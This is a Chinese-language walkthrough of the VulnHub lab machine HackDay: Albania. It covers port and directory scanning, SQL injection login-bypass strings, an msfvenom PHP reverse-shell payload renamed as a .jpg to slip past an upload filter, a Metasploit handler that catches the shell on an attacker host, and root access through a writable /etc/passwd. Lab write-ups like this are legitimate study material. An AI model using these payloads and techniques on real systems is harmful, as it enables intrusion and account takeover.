zoukankan      html  css  js  c++  java

  • Hacking HackDay: Albania

     概述:

    Name: HackDay: Albania

    Date release: 18 Nov 2016

    Author: R-73eN

    Series: HackDay

    下载:

    https://download.vulnhub.com/hackday/HackDay-Albania.ova

    nmap扫描探测

    http://10.10.202.133:8008/

    Mr . robot

    ╰─ dirb http://10.10.202.133:8008/

    挨着尝试访问,最后/unisxcudkqjydw/ 这个比较有价值

     

    尝试SQLmap盲注跑一波

    尝试抓包:

    POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1

    Host: 10.10.202.133:8008

    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: en-US,en;q=0.5

    Accept-Encoding: gzip, deflate

    Referer: http://10.10.202.133:8008/unisxcudkqjydw/vulnbank/client/login

    Cookie: SESS93de7c0ce497c83093bc4a5806deade0=d66ig2hk5ufi6rr3o8dsjr8pf2; PHPSESSID=ue38kb5dtgl000bheit23llit7

    Connection: close

    Upgrade-Insecure-Requests: 1

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 27

    username=admin&password=123456

     

    ╰─ sqlmap -r 1.txt --level=5 

    Username admin'

    Password: admin

    MySQL中的注释符 # --

    Username: ' or '1' = '1

    Password:  ' or '1' = '1

    Username: ' or 'aucc' = 'aucc';#

    password: 为空,或者随便填写

    Select * from users where username='$username' and password='$passwrod'

    Select * from users where username='' or 'aucc' = 'aucc';#' and password=''

    Select * from users where username=''  or  'aucc' = 'aucc';    #永远为真

     

    Username: admin' or 'admin'='admin' --

    Password: '#

    Select * from users where username='$username' and password='$passwrod'

    Select * from users where username='admin' or 'admin'='admin' --' and password=''#'

    Select * from users where username='admin' or 'admin'='admin'  and password=''  #永远为真

    上传PHP脚本文件,提示:After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc.

    这是使用PHP反弹shell

    ╰─ msfvenom -p  php/meterpreter/reverse_tcp lhost=10.10.202.135 lport=444 -f raw > hack404.jpg

     

    msf5 > use exploit/multi/handler

    msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

    msf5 exploit(multi/handler) > set lhost 10.10.202.135

    msf5 exploit(multi/handler) > set lport 4444

    msf5 exploit(multi/handler) > show options

    提权

    寻找可写文件

    find / -writable -type f 2>/dev/null

    /etc/passwd

    ╰─ openssl passwd -1 -salt hack404

    Password:

    $1$hack404$N5Uuhmgb2KCDq5X8GxB7V0
  • 相关阅读:
    从头学pytorch(二十一):全连接网络dense net
    Linux环境实现python远程可视编程
    centos7安装Anaconda3
    sql语句中包含引号处理方法
    syslog 日志
    python 判断是否为中文
    numpy简介
    django之模板显示静态文件
    Linux(Ubuntu)安装libpcap
    Bug预防体系
  • 原文地址:https://www.cnblogs.com/hack404/p/10496996.html
Copyright © 2011-2022 走看看